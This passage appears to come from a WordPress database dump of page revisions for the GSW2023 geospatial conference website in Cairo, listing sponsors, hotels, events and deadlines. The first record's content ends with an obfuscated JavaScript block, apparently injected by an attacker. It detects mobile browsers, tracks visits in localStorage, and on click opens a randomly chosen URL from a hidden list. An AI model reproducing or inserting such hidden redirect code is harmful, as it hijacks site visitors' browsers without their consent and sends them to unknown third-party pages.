|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:21:30','2023-06-25 16:21:30','',3066,'https://gsw2023.com/?p=4825',0,'revision','',0),
(4826,4,'2023-06-25 16:26:19','2023-06-25 16:26:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687710374753{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 